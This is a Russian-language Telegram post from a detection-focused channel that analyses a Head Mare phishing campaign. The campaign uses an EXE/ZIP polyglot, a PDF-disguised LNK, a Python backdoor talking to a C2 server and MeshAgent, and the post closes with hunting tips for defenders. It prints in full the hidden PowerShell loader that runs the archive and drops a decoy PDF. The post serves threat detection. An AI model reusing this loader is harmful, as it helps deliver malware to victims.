TGViewer
Detection is easy Detection is easy @detectioneasy · 1.29K subscribers
Post #186 818
Сегодня, поговорим о группировке Head Mare 💻

🔤 хакеры присылают фишинговое письмо с запароленным архивом. вышеописанный архив - это полиглот - EXE/ZIP. В архиве находится LNK-файл с расширением - PDF

🔤 При запуске LNK-файла выполнится следующая команда, которая найдет путь к архиву, выполнит его как исполняемый файл. Далее отрежет часть архива и запустит pdf-decoy-файл


powershell.exe -WindowStyle hidden -c "$r=$(Get-Location).Path + '\Заявка_[REDACTED]_5_03Д.zip';

if(Test-Path $r) {
cmd.exe /c start /B $r;
} else {
$f=$(Get-ChildItem -Path '%userprofile%' -Recurse -Filter 'Заявка_[REDACTED]_5_03Д.zip' | Select-Object -First 1);
if($f) {
$r=$f.FullName; cmd.exe /c start /B $f.FullName;
};
};
if(-Not (Test-Path $r)) {
$r=$(Get-ChildItem -Path '%temp%' -Recurse -Filter
"Заявка_[REDACTED]_5_03Д.zip" | Select-Object -First 1).FullName;
};
[System.IO.File]::WriteAllBytes(
[System.IO.Path]::Combine('%temp%','Заявка_[REDACTED]_5_03Д.pdf'),
([System.IO.File]::ReadAllBytes($r) | Select-Object -Skip 7166046 -First 147100)
);
Start-Process -FilePath $([System.IO.Path]::Combine('%temp%', 'Заявка_[REDACTED]_5_03Д.pdf'));


🔤 архив содержит Python-бекдор собранный PyInstaller'ом. Скрипт отправляет на C2 информацию о себе, и получает статус об успешной регистрации бота

🔤 далее выполнялись команды для сбора информации о системе, и в некоторых случаях устанавливался Meshagent

Что можно похантить?) 🔭
🔤 если у Вас не заблокирована пересылка архивов с паролем, и письма где-то хранятся. Ищем письма в которых содержится слово пароль и (ссылка или вложение). Хакеры часто используют пароль для архивов или облака, чтобы обойти песочницу и почтовые шлюзы

🔤 Проверяем в событиях Powershell наличие командлетов ReadAllBytes, System.IO.Path, Combine

🔤 запуск архива, странным способом в данном случае start

🔤 проверяем создание дирректорий Python

🔤 проверяем отсутствие процессов с именем MeshAgent.exe и служб с именем или описанием Mesh Agent

#ttp@detectioneasy
#detection@detectioneasy
  • 🔥 9
  • 👍 5
  • 🤔 3
More from @detectioneasy
  1. Jul 29, 2026Всем привет 💻✌️ При проведении compromise assessment на Windows-машине в WORKGROUP сразу…
  2. Jul 16, 2026Всем привет 💻✌️ Коллеги из Инфотекс сообщают о возможной компрометации пользователей, пут…
  3. May 15, 2026Всем привет 💻✌️ Коллеги из PT ESC разобрали кампанию CapFix, нацеленную на российские орг…
  4. May 8, 2026В Windows 11 версии 24H2 и Windows Server 2025 добавлены новая политика и события аудита N…
  5. Apr 7, 2026Всем привет 💻✌️ Автор статьи показал интересный способ доставки вредоносного ПО в обход п…
  6. Mar 15, 2026Всем привет 💻✌️ Тема с ярлыками остаётся актуальной и для некоторых дистрибутивов Linux.…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →